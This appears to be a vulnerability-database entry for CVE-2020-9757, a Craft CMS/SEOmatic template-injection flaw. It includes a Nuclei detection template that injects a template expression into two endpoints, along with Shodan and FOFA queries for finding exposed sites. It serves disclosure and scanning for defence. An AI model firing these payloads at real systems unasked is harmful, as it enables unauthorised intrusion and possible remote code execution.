CVE-2020-9757: Craft CMS < 3.3.0 - Server-Side Template Injection

日期: 2025-08-01 | 影响软件: Craft CMS | POC: 已公开

漏洞描述

Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.

PoC代码[已公开]

id: CVE-2020-9757

info:
  name: Craft CMS < 3.3.0 - Server-Side Template Injection
  author: dwisiswant0
  severity: critical
  description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server.
  remediation: |
    Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
  reference:
    - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
    - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
    - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
    - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9757
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9757
    cwe-id: CWE-74
    epss-score: 0.93272
    epss-percentile: 0.99802
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:craftcms
      - http.favicon.hash:-47932290
    fofa-query:
      - icon_hash=-47932290
      - body=craftcms
    publicwww-query: craftcms
  tags: cve,cve2020,ssti,craftcms

http:
  - method: GET
    path:
      - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
      - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"

    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "MetaLinkContainer"
          - "canonical"
          - "22344"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210082f10a22682913ff0e06b645734e5d05a1fbbd678dd5cf619e06018b06cbc9eb022100fa1d43c1c28eccdb28f091414f58c48132f536d1ce3ac181c08bb5708b339d4a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐